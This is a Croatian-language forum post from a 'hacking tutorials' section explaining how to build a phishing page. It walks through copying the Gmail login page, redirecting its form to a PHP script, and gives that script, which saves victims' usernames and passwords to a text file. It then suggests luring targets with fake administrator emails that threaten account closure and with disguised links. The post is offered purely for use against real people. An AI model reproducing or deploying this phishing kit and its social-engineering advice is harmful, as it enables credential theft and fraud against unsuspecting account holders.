DIR Return Create A Forum - Home
---------------------------------------------------------
Link Systems
HTML https://linksystems.createaforum.com
---------------------------------------------------------
*****************************************************
DIR Return to: Hakerski Tutoriali
*****************************************************
#Post#: 26--------------------------------------------------
Kako napraviti Phisher
By: ShaPpel Date: April 11, 2012, 10:19 am
---------------------------------------------------------
1. Šta je phisher?
Phisher je 'kopija' neke originalne web login stranice (vaša
lažna kopija koju napravite) koja 'krade' nečije "username"
i "password" i šalje vama.
-Za primjer phishinga ću koristiti Gmail (možete koristiti
koju god želite)
2. Kako napraviti phisher?
Prvo što trebate napraviti je registrirati se na neku od web
hosting stranica koja podržava PHP. Ja koristim t35. pa ću
je staviti kao primjer. Odete na www. t35. com (uklonite razmake
jer je na ovom forumu zabranjen link za tu stranicu) i napravite
free account.
Sada odite na Gmail login stranicu:
HTML https://www.google.com/accounts/ServiceLogin?
i kliknete desnim
klikom na neki prazan prostor i odaberete View Page Source i
cijeli tekst koji vidite copy i paste u notepad. U notepadu
idite u Edit pa naredbu Find i unesete riječ "action" (bez
navodnih znakova "), ovisno o stranici može biti više 'actiona'.
Mi tražimo onaj koji se nalazi blizu nekog 'login linka' kao što
je navedeno u sledećem primjeru:
Code:
action="
HTML https://www.google.com/accounts/ServiceLoginAuth"<br
/>method="post"
onsubmit="return(gaia_onLoginSubmit());">
sada ovaj link koji se nalazi pored 'actiona' i nalazi u
navodnim znakovima promijenimo u: write.php ,a pokraj toga
vidimo: method="post" .to promijenimo u: method="get" .Evo
primjera kako to treba izgledati:
Code:
action="write.php" method="get"
onsubmit="return(gaia_onLoginSubmit());">
kad smo to izmjenili spremimo fajl kao 'index.htm' (bez navodnih
znakova). Sada moramo napraviti 'write.php' fajl koji smo
spomenuli gore u primjeru.Njegova funkcija je da usernames i
passwords sprema u text dokument.Otvorimo notepad i Paste
sljedeći tekst:
Code:
header ('Location:
HTML http://mail.google.com/
');
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
sada spremimo fajl kao 'write.php' (bez '' znakova)
Nakon ovog bi trebali imati dva fajla: 'index.htm' i
'write.php'. Sada ta dva fajla samo uploadamo na naš t35.
account.
I čestitam! Imate phisher! cooool
HTML link za vašu phishing stranicu je http://xxx. t35. com/index.php
-gdje je 'xxx' vaše account ime.
3. Kako prevariti ljude da idu na vaš phisher?
Ovdje je najkorisnija vaša osobna kreativnost, ali neki od
najčešćih načina su da napravite e-mail
sličan administratoru i pošaljete vašoj 'žrtvi' na mail
nešto kao oblika da treba napraviti update jer će account
iseći za 30 dana ili nešto slično. Imajte na umu
sakriti vaš phish link. Ako šaljete mail koristite 'hyperlink'.
Ukoliko phisher postate na forume koristite sljedeće:
Code:
Originalni-Link-Stranice-Koju-Phishate
na primjer
HTML http://www.facebook.com/
izgleda kao facebook ali vas
vodi na google ako kliknete.
Imate i drugih razno-raznih načina za prevariti ljude
phisherom, ali opet napominjem,najbitnija je vaša osobna
kreativnost.
Nadam se da vam je ovaj tutorial pomogao i objasnio što je
phishing i kako funkcionira.Kao primjer je uzet Gmail,ali
postupak je isti za skoro svaku stranicu. (za Hotmail je nešto
drugačiji) Pokušao sam biti što jednostavniji da bi ga
početnici lakše razumjeli.Sada kad ste naučili
funkciju phishinga, ostaju vam na raspolaganju razni načini
kako phisherom prevariti ljude.
*****************************************************